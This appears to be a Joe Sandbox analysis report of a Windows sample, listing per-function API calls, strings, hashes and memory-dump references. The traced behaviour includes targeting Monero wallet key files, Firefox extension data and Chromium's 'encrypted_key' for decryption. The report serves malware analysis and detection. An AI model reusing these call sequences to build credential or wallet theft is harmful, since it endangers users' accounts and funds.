Instruction ID: 488f3d18419446d9b5fd9af4aa6402af51d8f7c9405b6c96169584d61f07ebdc
Opcode Fuzzy Hash: 512efa95d8f16de3cf0779f858c728ed3ba70094c44600317e70dd12a09a17cb
Instruction Fuzzy Hash: C4316DB290031DA7CB10FBA0DC85EE973BCAB58704F4045E9B319D6092EE749689CFA5

Function 00B97E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97E37
RtlAllocateHeap.NTDLL(00000000), ref: 00B97E3E
RegOpenKeyExA.KERNEL32(80000002,0132C428,00000000,00020119,?), ref: 00B97E5E
RegQueryValueExA.KERNEL32(?,0133D620,00000000,00000000,000000FF,000000FF), ref: 00B97E7F
RegCloseKey.ADVAPI32(?), ref: 00B97E92

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 0d2e4f1b0293263f963760ce99b24f49c1a3431e1d4047edb5edb56fb67543e3
Instruction ID: 1c2a258276493fc5000e559048403b5777bdd70bd868f75cefc5fe4c26dbd30d
Opcode Fuzzy Hash: 0d2e4f1b0293263f963760ce99b24f49c1a3431e1d4047edb5edb56fb67543e3
Instruction Fuzzy Hash: 88113DB1A4430AEBDB04CB99DD49FABBBFCEB44B14F1041A9F605E7280DB7458018BA1

Function 00B812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B812B4
RtlAllocateHeap.NTDLL(00000000), ref: 00B812BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00B812D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B812F5
RegCloseKey.ADVAPI32(?), ref: 00B812FF

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 51e2efa6234d20e0d2e2b72e28e2e884e019b1e864264292dd70a575cf7bf6d0
Instruction ID: 9ab424eee9533ad1376e759f3957d49914decad4344c9700605c4b027b0a0893
Opcode Fuzzy Hash: 51e2efa6234d20e0d2e2b72e28e2e884e019b1e864264292dd70a575cf7bf6d0
Instruction Fuzzy Hash: 49011DB9A4030EBBDB00DFE4DC49FAEB7B8EF48705F008159FA05D7280D6709A018B61

Function 00B8A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01339080,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 00B8A0BD
LoadLibraryA.KERNEL32(0133D840), ref: 00B8A146

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A820: lstrlen.KERNEL32(00B84F05,?,?,00B84F05,00BA0DDE), ref: 00B9A82B
Part of subcall function 00B9A820: lstrcpy.KERNEL32(00BA0DDE,00000000), ref: 00B9A885

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

SetEnvironmentVariableA.KERNEL32(01339080,00000000,00000000,?,00BA12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00BA0AFE), ref: 00B8A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00B8A0B2, 00B8A0C6, 00B8A0DC

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 3af8de5aa44a52c4c63e8220bed858f9b4bc8acabe88b871db69d2a6b8dfeb43
Instruction ID: c75805938a8f827dfaa08094fb9f894e0ef189b583dd7fdb62ead62df330812e
Opcode Fuzzy Hash: 3af8de5aa44a52c4c63e8220bed858f9b4bc8acabe88b871db69d2a6b8dfeb43
Instruction Fuzzy Hash: B2414EB185170B9FCB04EFA8EC99EA973B4B705309F240169E505D33B0DB359945CB72

Function 00B8A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B98B60: GetSystemTime.KERNEL32(00BA0E1A,0133A2B0,00BA05AE,?,?,00B813F9,?,0000001A,00BA0E1A,00000000,?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B98B86

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B8A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 00B8A3FF
lstrlen.KERNEL32(00000000), ref: 00B8A6BC

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

DeleteFileA.KERNEL32(00000000), ref: 00B8A743

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2a508efae9809154f64b45170f0b9cfd945c77d848c280fc21cd943d69a38aac
Instruction ID: a5ce587a01f384c701925a2342e3ded9ccf88a72f6121d663026b39c661b4531
Opcode Fuzzy Hash: 2a508efae9809154f64b45170f0b9cfd945c77d848c280fc21cd943d69a38aac
Instruction Fuzzy Hash: D5E1D2728101199BDF05FBA4DC92EEE73BCAF14300F5081A9F516B6191EF346A49CBB6

Function 00B8D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B98B60: GetSystemTime.KERNEL32(00BA0E1A,0133A2B0,00BA05AE,?,?,00B813F9,?,0000001A,00BA0E1A,00000000,?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B98B86

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B8D801
lstrlen.KERNEL32(00000000), ref: 00B8D99F
lstrlen.KERNEL32(00000000), ref: 00B8D9B3
DeleteFileA.KERNEL32(00000000), ref: 00B8DA32

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e7f327d14ec76ee809375e22fc4e56d76422b56407c69ca2aeda262e408ad6c
Instruction ID: 866067395d0cf08d0c878312526dfdeec848c212de3cdda5b7bff2dfea4de7cb
Opcode Fuzzy Hash: 9e7f327d14ec76ee809375e22fc4e56d76422b56407c69ca2aeda262e408ad6c
Instruction Fuzzy Hash: 4B81ED729201199BCF04FBA4DC96DEE73B8AF14304F5045B9F506B61A1EE346A09CBB6

Function 00B8F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
Part of subcall function 00B899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
Part of subcall function 00B899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
Part of subcall function 00B899C0: ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
Part of subcall function 00B899C0: LocalFree.KERNEL32(00B8148F), ref: 00B89A90
Part of subcall function 00B899C0: CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

Part of subcall function 00B98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B98E52

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BA1580,00BA0D92), ref: 00B8F54C
lstrlen.KERNEL32(00000000), ref: 00B8F56B

Strings

^userContextId=4294967295, xrefs: 00B8F59C
moz-extension+++, xrefs: 00B8F5AD

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 6fffabab1e6fd2d739be29391ab83828a7dea6267912dbf8c931e5a56e798299
Instruction ID: 2e8de6d1ada8e5d4915c700ced01acd74e7af5761c0e1407d64b106647069a21
Opcode Fuzzy Hash: 6fffabab1e6fd2d739be29391ab83828a7dea6267912dbf8c931e5a56e798299
Instruction Fuzzy Hash: 8251DB72D10108AADF04FBB4DC96DED73B9AF55300F4085B8F816A7191EE346A09CBE2

Function 00B89CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
Part of subcall function 00B899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
Part of subcall function 00B899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
Part of subcall function 00B899C0: ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
Part of subcall function 00B899C0: LocalFree.KERNEL32(00B8148F), ref: 00B89A90
Part of subcall function 00B899C0: CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

Part of subcall function 00B98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B98E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B89D39

Part of subcall function 00B89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89AEF
Part of subcall function 00B89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B84EEE,00000000,?), ref: 00B89B01
Part of subcall function 00B89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89B2A
